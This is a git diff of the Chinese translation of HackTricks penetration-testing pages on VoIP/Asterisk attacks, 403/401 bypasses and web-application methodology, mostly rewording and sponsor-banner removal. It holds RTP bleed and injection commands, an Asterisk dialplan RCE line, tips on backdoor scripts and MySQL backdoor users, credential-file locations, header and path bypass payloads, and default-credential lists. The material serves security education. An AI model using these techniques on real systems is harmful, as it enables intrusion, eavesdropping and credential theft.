+RTP 代理尝试通过在两个或多个参与者之间代理 RTP 流来解决影响 RTC 系统的 **NAT 限制**。当 NAT 存在时,RTP 代理软件通常无法依赖通过信令(例如 SIP)获取的 RTP IP 和端口信息。因此,一些 RTP 代理实现了一种机制,使得这样的 **IP 和端口元组能够自动学习**。这通常是通过检查传入的 RTP 流量并将任何传入 RTP 流量的源 IP 和端口标记为应响应的来完成的。这种机制可能被称为“学习模式”,**不使用任何形式的身份验证**。因此,**攻击者**可以 **向 RTP 代理发送 RTP 流量**,并接收原本应发送给正在进行的 RTP 流的呼叫者或被叫者的代理 RTP 流量。我们称这种漏洞为 RTP Bleed,因为它允许攻击者接收原本应发送给合法用户的 RTP 媒体流。
 
-RTP 代理和 RTP 堆栈的另一个有趣行为是,有时 **即使不易受 RTP Bleed 漏洞影响**,它们仍会 **接受、转发和/或处理来自任何源的 RTP 数据包**。因此,攻击者可以发送 RTP 数据包,这可能允许他们注入自己的媒体,而不是合法的媒体。我们称这种攻击为 RTP 注入,因为它允许将不合法的 RTP 数据包注入到现有的 RTP 流中。此漏洞可能在 RTP 代理和端点中发现。
+RTP 代理和 RTP 堆栈的另一个有趣行为是,有时 **即使不易受 RTP Bleed 漏洞影响**,它们仍会 **接受、转发和/或处理来自任何源的 RTP 数据包**。因此,攻击者可以发送 RTP 数据包,这可能允许他们注入自己的媒体,而不是合法的媒体。我们称这种攻击为 RTP 注入,因为它允许将不合法的 RTP 数据包注入到现有的 RTP 流中。此漏洞可能在 RTP 代理和终端中发现。
 
 Asterisk 和 FreePBX 传统上使用 **`NAT=yes` 设置**,这使得 RTP 流量能够绕过身份验证,可能导致通话中没有音频或单向音频。
 
@@ -546,33 +538,33 @@ sippts rtcpbleed -i 10.10.0.10
 ```bash
 sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v
 ```
-- **`SIPPTS rtpbleedinject`** 来自 [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedinject 利用 RTP Bleed 漏洞注入音频文件(WAV 格式)。
+- **`SIPPTS rtpbleedinject`**来自[**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedinject 利用 RTP Bleed 漏洞注入音频文件(WAV 格式)。
 ```bash
 sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav
 ```
 ### RCE
 
-在 Asterisk 中,如果你能够以某种方式 **添加扩展规则并重新加载它们**(例如,通过攻陷一个易受攻击的网络管理服务器),就有可能使用 **`System`** 命令获得 RCE。
+在 Asterisk 中,如果你能够 **添加扩展规则并重新加载它们**(例如,通过攻陷一个易受攻击的网络管理服务器),就有可能使用 **`System`** 命令获得 RCE。
 ```scss
 same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
 ```
 有一个命令叫做 **`Shell`**,可以在必要时 **替代 `System`** 来执行系统命令。
 
 > [!WARNING]
-> 如果服务器 **不允许在 `System`** 命令中使用某些字符(如在 Elastix 中),请检查 web 服务器是否允许 **以某种方式在系统内创建文件**(如在 Elastix 或 trixbox 中),并利用它 **创建一个后门脚本**,然后使用 **`System`** 来 **执行** 该 **脚本**。
+> 如果服务器 **不允许在 `System`** 命令中使用某些字符(如在 Elastix 中),请检查网络服务器是否允许 **以某种方式在系统内部创建文件**(如在 Elastix 或 trixbox 中),并利用它 **创建一个后门脚本**,然后使用 **`System`** 来 **执行** 该 **脚本**。
 
 #### 有趣的本地文件和权限
 
 - **`sip.conf`** -> 包含 SIP 用户的密码。
-- 如果 **Asterisk 服务器以 root 身份运行**,您可能会危害 root。
+- 如果 **Asterisk 服务器以 root 身份运行**,您可能会危害 root 权限。
 - **mysql root 用户** 可能 **没有任何密码**。
 - 这可以用来创建一个新的 mysql 用户作为后门。
 - **`FreePBX`**
-- **`amportal.conf`** -> 包含 web 面板管理员(FreePBX)的密码。
+- **`amportal.conf`** -> 包含网络面板管理员(FreePBX)的密码。
 - **`FreePBX.conf`** -> 包含用于访问数据库的用户 FreePBXuser 的密码。
 - 这可以用来创建一个新的 mysql 用户作为后门。
 - **`Elastix`**
-- **`Elastix.conf`** -> 包含多个明文密码,如 mysql root 密码、IMAPd 密码、web 管理员密码。
+- **`Elastix.conf`** -> 包含多个明文密码,如 mysql root 密码、IMAPd 密码、网络管理员密码。
 - **多个文件夹** 将属于被攻陷的 asterisk 用户(如果不是以 root 身份运行)。该用户可以读取之前的文件并控制配置,因此他可以使 Asterisk 在执行时加载其他后门二进制文件。
 
 ### RTP 注入
@@ -598,7 +590,7 @@ same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
 
 ### 操作系统漏洞
 
-安装像 Asterisk 这样的软件最简单的方法是下载一个已经安装了它的 **操作系统发行版**,例如:**FreePBX、Elastix、Trixbox**... 这些的一个问题是,一旦它工作,系统管理员可能 **不会再更新它们**,并且 **漏洞** 会随着时间的推移被发现。
+安装像 Asterisk 这样的软件最简单的方法是下载一个已经安装了它的 **操作系统发行版**,例如:**FreePBX、Elastix、Trixbox**... 这些的一个问题是,一旦它工作,系统管理员可能 **不会再更新它们**,而 **漏洞** 会随着时间的推移被发现。
 
 ## 参考文献
 
diff --git a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
index 028bb93e1..2078221f8 100644
--- a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
+++ b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
@@ -2,27 +2,19 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,查找允许您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 ## HTTP 动词/方法模糊测试
 
-尝试使用**不同的动词**访问文件:`GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
+尝试使用 **不同的动词** 访问文件: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
 
-- 检查响应头,可能会提供一些信息。例如,**HEAD**的**200响应**与`Content-Length: 55`意味着**HEAD动词可以访问信息**。但您仍然需要找到一种方法来提取该信息。
-- 使用HTTP头如`X-HTTP-Method-Override: PUT`可以覆盖所使用的动词。
-- 使用**`TRACE`**动词,如果您非常幸运,可能在响应中也能看到**中间代理添加的头**,这可能会很有用。
+- 检查响应头,可能会提供一些信息。例如,**HEAD 的 200 响应** 和 `Content-Length: 55` 表示 **HEAD 动词可以访问信息**。但你仍然需要找到一种方法来提取该信息。
+- 使用 HTTP 头如 `X-HTTP-Method-Override: PUT` 可以覆盖所使用的动词。
+- 使用 **`TRACE`** 动词,如果你非常幸运,可能在响应中也能看到 **中间代理添加的头**,这可能会很有用。
 
 ## HTTP 头模糊测试
 
-- **更改 Host 头**为某个任意值([这里有效](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31))
-- 尝试[**使用其他用户代理**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt)访问资源。
-- **模糊测试 HTTP 头**:尝试使用HTTP代理**头**、HTTP基本身份验证和NTLM暴力破解(仅使用少量组合)及其他技术。为此,我创建了工具[**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass)。
+- **更改 Host 头** 为某个任意值 ([这里有效](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31))
+- 尝试 [**使用其他用户代理**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) 访问资源。
+- **模糊 HTTP 头**:尝试使用 HTTP 代理 **头**、HTTP 基本认证和 NTLM 暴力破解(仅使用少量组合)及其他技术。为此,我创建了工具 [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass)。
 
 - `X-Originating-IP: 127.0.0.1`
 - `X-Forwarded-For: 127.0.0.1`
@@ -38,22 +30,22 @@
 - `X-ProxyUser-Ip: 127.0.0.1`
 - `Host: localhost`
 
-如果**路径受到保护**,您可以尝试使用这些其他头绕过路径保护:
+如果 **路径被保护**,你可以尝试使用这些其他头绕过路径保护:
 
 - `X-Original-URL: /admin/console`
 - `X-Rewrite-URL: /admin/console`
 
-- 如果页面在**代理后面**,可能是代理阻止您访问私人信息。尝试利用[**HTTP请求走私**](../../pentesting-web/http-request-smuggling/)**或**[**逐跳头**](../../pentesting-web/abusing-hop-by-hop-headers.md)**。**
-- 模糊测试[**特殊HTTP头**](special-http-headers.md)寻找不同的响应。
-- **在模糊测试HTTP方法时模糊测试特殊HTTP头**。
-- **移除Host头**,也许您将能够绕过保护。
+- 如果页面在 **代理后面**,可能是代理阻止你访问私有信息。尝试利用 [**HTTP 请求走私**](../../pentesting-web/http-request-smuggling/) **或** [**逐跳头**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.**
+- 模糊 [**特殊 HTTP 头**](special-http-headers.md) 寻找不同的响应。
+- **在模糊 HTTP 方法时模糊特殊 HTTP 头**。
+- **移除 Host 头**,也许你将能够绕过保护。
 
-## 路径**模糊测试**
+## 路径 **模糊测试**
 
-如果_/path_被阻止:
+如果 _/path_ 被阻止:
 
-- 尝试使用_**/**_**%2e/path \_(如果访问被代理阻止,这可能绕过保护)。也尝试**\_\*\* /%252e\*\*/path(双重URL编码)
-- 尝试**Unicode绕过**:_/**%ef%bc%8f**path_(URL编码字符类似于“/”),因此当重新编码时将变为_//path_,也许您已经绕过了_/path_名称检查
+- 尝试使用 _**/**_**%2e/path \_(如果访问被代理阻止,这可能绕过保护)。也尝试**\_\*\* /%252e\*\*/path(双重 URL 编码)
+- 尝试 **Unicode 绕过**: _/**%ef%bc%8f**path_(URL 编码字符类似于 "/"),因此当重新编码时将变为 _//path_,也许你已经绕过了 _/path_ 名称检查
 - **其他路径绕过**:
 - site.com/secret –> HTTP 403 Forbidden
 - site.com/SECRET –> HTTP 200 OK
@@ -65,44 +57,44 @@
 - site.com/.;/secret –> HTTP 200 OK
 - site.com//;//secret –> HTTP 200 OK
 - site.com/secret.json –> HTTP 200 OK (ruby)
-- 在以下情况下使用[**此列表**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Unicode.txt):
+- 在以下情况下使用 [**此列表**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Unicode.txt):
 - /FUZZsecret
 - /FUZZ/secret
 - /secretFUZZ
-- **其他API绕过:**
+- **其他 API 绕过:**
 - /v3/users_data/1234 --> 403 Forbidden
 - /v1/users_data/1234 --> 200 OK
 - {“id”:111} --> 401 Unauthorized
 - {“id”:\[111]} --> 200 OK
 - {“id”:111} --> 401 Unauthorized
 - {“id”:{“id”:111\}} --> 200 OK
-- {"user_id":"\","user_id":"\"} (JSON参数污染)
+- {"user_id":"\","user_id":"\"} (JSON 参数污染)
 - user_id=ATTACKER_ID\&user_id=VICTIM_ID (参数污染)
 
 ## **参数操控**
 
-- 更改**参数值**:从**`id=123` --> `id=124`**
-- 向URL添加额外参数:`?`**`id=124` —-> `id=124&isAdmin=true`**
+- 更改 **参数值**:从 **`id=123` --> `id=124`**
+- 向 URL 添加额外参数: `?`**`id=124` —-> `id=124&isAdmin=true`**
 - 移除参数
 - 重新排序参数
 - 使用特殊字符。
-- 在参数中执行边界测试——提供值如_-234_或_0_或_99999999_(仅为一些示例值)。
+- 在参数中执行边界测试 — 提供值如 _-234_ 或 _0_ 或 _99999999_(仅为一些示例值)。
 
 ## **协议版本**
 
-如果使用HTTP/1.1 **尝试使用1.0**,甚至测试是否**支持2.0**。
+如果使用 HTTP/1.1 **尝试使用 1.0** 或甚至测试是否 **支持 2.0**。
 
 ## **其他绕过**
 
-- 获取域的**IP**或**CNAME**并尝试**直接联系**它。
-- 尝试**给服务器施加压力**,发送常见的GET请求([这对这个Facebook用户有效](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125))。
-- **更改协议**:从http到https,或从https到http
-- 访问[**https://archive.org/web/**](https://archive.org/web/)并检查过去该文件是否**全球可访问**。
+- 获取域的 **IP** 或 **CNAME** 并尝试 **直接联系**。
+- 尝试 **施压服务器** 发送常见的 GET 请求 ([这个人用 Facebook 有效](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)).
+- **更改协议**:从 http 到 https,或从 https 到 http
+- 访问 [**https://archive.org/web/**](https://archive.org/web/) 并检查过去该文件是否 **全球可访问**。
 
 ## **暴力破解**
 
-- **猜测密码**:测试以下常见凭据。您对受害者了解多少?或者CTF挑战的名称?
-- [**暴力破解**](../../generic-hacking/brute-force.md#http-brute)**:** 尝试基本、摘要和NTLM身份验证。
+- **猜测密码**:测试以下常见凭据。你对受害者了解些什么吗?或者 CTF 挑战的名称?
+- [**暴力破解**](../../generic-hacking/brute-force.md#http-brute)**:** 尝试基本、摘要和 NTLM 认证。
 ```:Common creds
 admin    admin
 admin    password
@@ -113,7 +105,7 @@ root     toor
 test     test
 guest    guest
 ```
-## 自动工具
+## 自动化工具
 
 - [https://github.com/lobuhi/byp4xx](https://github.com/lobuhi/byp4xx)
 - [https://github.com/iamj0ker/bypass-403](https://github.com/iamj0ker/bypass-403)
@@ -122,12 +114,5 @@ guest    guest
 - [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
 - [NoMoreForbidden](https://github.com/akinerk/NoMoreForbidden)
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,查找允许您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md
index 9d8499879..3254411fd 100644
--- a/src/network-services-pentesting/pentesting-web/README.md
+++ b/src/network-services-pentesting/pentesting-web/README.md
@@ -2,19 +2,11 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用程序、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 ## 基本信息
 
-Web服务是最**常见和广泛的服务**,存在许多**不同类型的漏洞**。
+网络服务是最 **常见和广泛的服务**,并且存在许多 **不同类型的漏洞**。
 
-**默认端口:** 80 (HTTP), 443(HTTPS)
+**默认端口:** 80 (HTTP),443(HTTPS)
 ```bash
 PORT    STATE SERVICE
 80/tcp  open  http
@@ -25,22 +17,22 @@ PORT    STATE SERVICE
 nc -v domain.com 80 # GET / HTTP/1.0
 openssl s_client -connect domain.com:443 # GET / HTTP/1.0
 ```
-### Web API Guidance
+### Web API 指导
 
 {{#ref}}
 web-api-pentesting.md
 {{#endref}}
 
-## Methodology summary
+## 方法论总结
 
-> 在这个方法论中,我们假设你将攻击一个域(或子域)而仅此而已。因此,你应该将此方法论应用于每个发现的域、子域或具有不确定网络服务器的IP。
+> 在这个方法论中,我们假设你将攻击一个域(或子域)而仅此而已。因此,你应该将此方法论应用于每个发现的域、子域或具有不确定网络服务器的 IP。
 
 - [ ] 首先**识别**网络服务器使用的**技术**。寻找**技巧**,以便在测试的其余部分中牢记,如果你能成功识别技术。
 - [ ] 该技术版本是否有任何**已知漏洞**?
 - [ ] 使用任何**知名技术**?有没有**有用的技巧**来提取更多信息?
-- [ ] 是否有任何**专业扫描器**可以运行(如wpscan)?
+- [ ] 有任何**专业扫描器**可以运行(如 wpscan)?
 - [ ] 启动**通用扫描器**。你永远不知道它们是否会发现某些东西或找到一些有趣的信息。
-- [ ] 从**初始检查**开始:**robots**、**sitemap**、**404**错误和**SSL/TLS扫描**(如果是HTTPS)。
+- [ ] 从**初始检查**开始:**robots**、**sitemap**、**404** 错误和 **SSL/TLS 扫描**(如果是 HTTPS)。
 - [ ] 开始**爬取**网页:是时候**查找**所有可能的**文件、文件夹**和**使用的参数**。同时,检查**特殊发现**。
 - [ ] _注意,在暴力破解或爬取过程中发现新目录时,应进行爬取。_
 - [ ] **目录暴力破解**:尝试暴力破解所有发现的文件夹,寻找新的**文件**和**目录**。
@@ -50,12 +42,12 @@ web-api-pentesting.md
 - [ ] 一旦你**识别**了所有可能接受**用户输入**的**端点**,检查与之相关的所有类型的**漏洞**。
 - [ ] [遵循此检查清单](../../pentesting-web/web-vulnerabilities-methodology.md)
 
-## Server Version (Vulnerable?)
+## 服务器版本(易受攻击?)
 
-### Identify
+### 识别
 
-检查正在运行的服务器**版本**是否有**已知漏洞**。\
-**HTTP响应的头部和cookie**可能非常有用,以**识别**所使用的**技术**和/或**版本**。**Nmap扫描**可以识别服务器版本,但工具[**whatweb**](https://github.com/urbanadventurer/WhatWeb)**、**[**webtech**](https://github.com/ShielderSec/webtech)或[**https://builtwith.com/**](https://builtwith.com)**也可能有用:**
+检查运行的服务器**版本**是否有**已知漏洞**。\
+**HTTP 响应的头部和 cookies**可能非常有用,以**识别**所使用的**技术**和/或**版本**。**Nmap 扫描**可以识别服务器版本,但工具 [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**、** [**webtech** ](https://github.com/ShielderSec/webtech)或 [**https://builtwith.com/**](https://builtwith.com)** 也可能有用:**
 ```bash
 whatweb -a 1  #Stealthy
 whatweb -a 3  #Aggresive
@@ -106,7 +98,7 @@ webanalyze -host https://google.com -crawl 2
 - [**Wordpress**](wordpress.md)
 - [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/)
 
-_请注意,**同一域**可能在不同的 **端口**、**文件夹**和 **子域**中使用 **不同的技术**。_\
+_请注意,**同一域**可能在不同的 **端口**、**文件夹** 和 **子域** 中使用 **不同的技术**。_\
 如果 web 应用程序使用了之前列出的任何知名 **技术/平台** 或 **其他**,请不要忘记 **在互联网上搜索** 新的技巧(并告诉我!)。
 
 ### 源代码审查
@@ -114,7 +106,7 @@ _请注意,**同一域**可能在不同的 **端口**、**文件夹**和 **子
 如果应用程序的 **源代码** 在 **github** 上可用,除了进行 **自己的白盒测试** 外,还有 **一些信息** 可能对当前的 **黑盒测试** **有用**:
 
 - 是否有 **变更日志、Readme 或版本** 文件,或任何可以通过网络访问的 **版本信息**?
-- **凭据** 是如何保存的?是否有任何(可访问的?) **文件** 包含凭据(用户名或密码)?
+- **凭据** 是如何保存的?是否有任何(可访问的?)**文件** 包含凭据(用户名或密码)?
 - **密码** 是 **明文**、**加密** 还是使用了哪种 **哈希算法**?
 - 是否使用了任何 **主密钥** 来加密某些内容?使用了哪种 **算法**?
 - 你能否通过利用某个漏洞 **访问这些文件**?
@@ -140,7 +132,7 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi
 ```
 #### CMS 扫描器
 
-如果使用了 CMS,不要忘记 **运行扫描器**,也许会发现一些有价值的信息:
+如果使用了 CMS,别忘了 **运行扫描器**,也许会发现一些有价值的信息:
 
 [**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\
 [**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** 网站的安全问题。 (GUI)\
@@ -157,7 +149,7 @@ joomlavs.rb #https://github.com/rastating/joomlavs
 
 ## 逐步网络应用发现
 
-> 从这一点开始,我们将开始与网络应用进行交互。
+> 从这一点开始,我们将开始与网络应用程序进行交互。
 
 ### 初步检查
 
@@ -168,7 +160,7 @@ joomlavs.rb #https://github.com/rastating/joomlavs
 - /crossdomain.xml
 - /clientaccesspolicy.xml
 - /.well-known/
-- 还要检查主页面和次级页面中的评论。
+- 还要检查主页面和次页面中的评论。
 
 **强制错误**
 
@@ -184,14 +176,14 @@ joomlavs.rb #https://github.com/rastating/joomlavs
 如果您发现**WebDav**已**启用**但您没有足够的权限在根文件夹中**上传文件**,请尝试:
 
 - **暴力破解**凭据
-- 通过WebDav向网页中**找到的其他文件夹**上传文件。您可能有权限在其他文件夹中上传文件。
+- 通过WebDav向网页内**找到的其他文件夹**上传文件。您可能有权限在其他文件夹中上传文件。
 
 ### **SSL/TLS漏洞**
 
 - 如果应用程序在任何部分**不强制用户使用HTTPS**,那么它**容易受到中间人攻击(MitM)**
 - 如果应用程序**使用HTTP发送敏感数据(密码)**,那么这是一个高风险漏洞。
 
-使用[**testssl.sh**](https://github.com/drwetter/testssl.sh)检查**漏洞**(在漏洞赏金计划中,这类漏洞可能不会被接受),并使用[**a2sv**](https://github.com/hahwul/a2sv)重新检查漏洞:
+使用[**testssl.sh**](https://github.com/drwetter/testssl.sh)检查**漏洞**(在Bug Bounty程序中,这类漏洞可能不会被接受),并使用[**a2sv**](https://github.com/hahwul/a2sv)重新检查漏洞:
 ```bash
 ./testssl.sh [--htmlfile] 10.10.10.10:443
 #Use the --htmlfile to save the output inside an htmlfile also
@@ -202,9 +194,6 @@ sslyze --regular 
 ```
 关于SSL/TLS漏洞的信息:
 
-- [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/)
-- [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
-
 ### 爬虫
 
 在网络中启动某种**爬虫**。爬虫的目标是**尽可能多地找到**被测试应用程序的路径。因此,应使用网络爬虫和外部来源来找到尽可能多的有效路径。
@@ -213,14 +202,14 @@ sslyze --regular 
 - [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML爬虫,带有JS文件的LinkFinder和Archive.org作为外部来源。
 - [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML爬虫,也指示“美味文件”。
 - [**evine** ](https://github.com/saeeddhqan/evine)(go): 交互式CLI HTML爬虫。它还在Archive.org中搜索。
-- [**meg**](https://github.com/tomnomnom/meg) (go): 该工具不是爬虫,但可能有用。您只需指示一个包含主机的文件和一个包含路径的文件,meg将获取每个主机上的每个路径并保存响应。
+- [**meg**](https://github.com/tomnomnom/meg) (go): 这个工具不是爬虫,但可能有用。您只需指示一个包含主机的文件和一个包含路径的文件,meg将获取每个主机上的每个路径并保存响应。
 - [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): 带有JS渲染功能的HTML爬虫。然而,它似乎没有维护,预编译版本较旧,当前代码无法编译。
 - [**gau**](https://github.com/lc/gau) (go): 使用外部提供者(wayback, otx, commoncrawl)的HTML爬虫。
-- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): 该脚本将找到带参数的URL并列出它们。
+- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): 这个脚本将找到带参数的URL并列出它们。
 - [**galer**](https://github.com/dwisiswant0/galer) (go): 带有JS渲染功能的HTML爬虫。
-- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML爬虫,具有JS美化功能,能够在JS文件中搜索新路径。查看[JSScanner](https://github.com/dark-warlord14/JSScanner)也可能值得一看,它是LinkFinder的一个包装器。
-- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): 提取HTML源代码和嵌入的JavaScript文件中的端点。对漏洞猎人、红队员、信息安全专家有用。
-- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): 使用Tornado和JSBeautifier从JavaScript文件中解析相对URL的Python 2.7脚本。对轻松发现AJAX请求很有用。看起来没有维护。
+- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML爬虫,具有JS美化功能,能够在JS文件中搜索新路径。查看[JSScanner](https://github.com/dark-warlord14/JSScanner)也可能值得,它是LinkFinder的一个包装器。
+- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): 从HTML源和嵌入的JavaScript文件中提取端点。对漏洞猎人、红队员、信息安全专家有用。
+- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): 一个使用Tornado和JSBeautifier从JavaScript文件中解析相对URL的Python 2.7脚本。对轻松发现AJAX请求有用。看起来没有维护。
 - [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): 给定一个文件(HTML),它将使用巧妙的正则表达式从丑陋(压缩)文件中提取相对URL。
 - [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, 多个工具): 使用多个工具从JS文件中收集有趣的信息。
 - [**subjs**](https://github.com/lc/subjs) (go): 查找JS文件。
@@ -239,16 +228,16 @@ sslyze --regular 
 
 ### 暴力破解目录和文件
 
-从根文件夹开始**暴力破解**,确保使用**此方法**暴力破解**所有**找到的**目录**以及通过**爬虫**发现的所有目录(您可以递归地进行此暴力破解,并在使用的字典开头附加找到的目录名称)。\
+从根文件夹开始**暴力破解**,确保使用**此方法**暴力破解**所有**找到的**目录**以及**爬虫**发现的所有目录(您可以递归地进行此暴力破解,并在使用的字典开头附加找到的目录名称)。\
 工具:
 
 - **Dirb** / **Dirbuster** - 包含在Kali中,**旧**(和**慢**)但功能正常。允许自动签名证书和递归搜索。与其他选项相比太慢。
 - [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: 它不允许自动签名证书,但**允许递归搜索。
-- [**Gobuster**](https://github.com/OJ/gobuster) (go): 它允许自动签名证书,但**没有** **递归**搜索。
+- [**Gobuster**](https://github.com/OJ/gobuster) (go): 它允许自动签名证书,但**没有**递归搜索。
 - [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- 快速,支持递归搜索。**
 - [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
 - [**ffuf** ](https://github.com/ffuf/ffuf)- 快速: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
-- [**uro**](https://github.com/s0md3v/uro) (python): 这不是一个爬虫,而是一个工具,给定找到的URL列表,将删除“重复”的URL。
+- [**uro**](https://github.com/s0md3v/uro) (python): 这不是一个爬虫,而是一个工具,给定找到的URL列表将删除“重复”的URL。
 - [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp扩展,从不同页面的burp历史中创建目录列表。
 - [**TrashCompactor**](https://github.com/michael1026/trashcompactor): 删除具有重复功能的URL(基于js导入)。
 - [**Chamaleon**](https://github.com/iustin24/chameleon): 它使用wapalyzer检测使用的技术并选择要使用的字典。
@@ -276,31 +265,31 @@ _注意,在暴力破解或爬虫过程中发现新目录时,应进行暴力
 
 ### 检查每个找到的文件
 
-- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): 查找HTML中的断开链接,这些链接可能容易被接管。
-- **文件备份**: 一旦找到所有文件,查找所有可执行文件的备份("_.php_","_.aspx_"...)。备份命名的常见变体有:_file.ext\~,#file.ext#,\~file.ext,file.ext.bak,file.ext.tmp,file.ext.old,file.bak,file.tmp和file.old._ 您还可以使用工具[**bfac**](https://github.com/mazen160/bfac) **或** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
+- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): 查找可能容易被接管的HTML中的断开链接。
+- **文件备份**: 一旦找到所有文件,查找所有可执行文件的备份("_.php_", "_.aspx_"...)。备份命名的常见变体有:_file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp和file.old._ 您还可以使用工具[**bfac**](https://github.com/mazen160/bfac) **或** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
 - **发现新参数**: 您可以使用工具如[**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **和** [**Param Miner**](https://github.com/PortSwigger/param-miner) **来发现隐藏参数。如果可以,您可以尝试在每个可执行的Web文件中搜索**隐藏参数。
 - _Arjun所有默认字典:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
 - _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
 - _Assetnote “parameters_top_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
 - _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
 - **评论:** 检查所有文件的评论,您可以找到**凭据**或**隐藏功能**。
-- 如果您在**CTF**中,"常见"的技巧是在**页面**的**右侧**(使用**数百个**空格,以便在使用浏览器打开源代码时看不到数据)**隐藏** **信息**。另一种可能性是在网页的**底部**使用**多个新行**并在评论中**隐藏信息**。
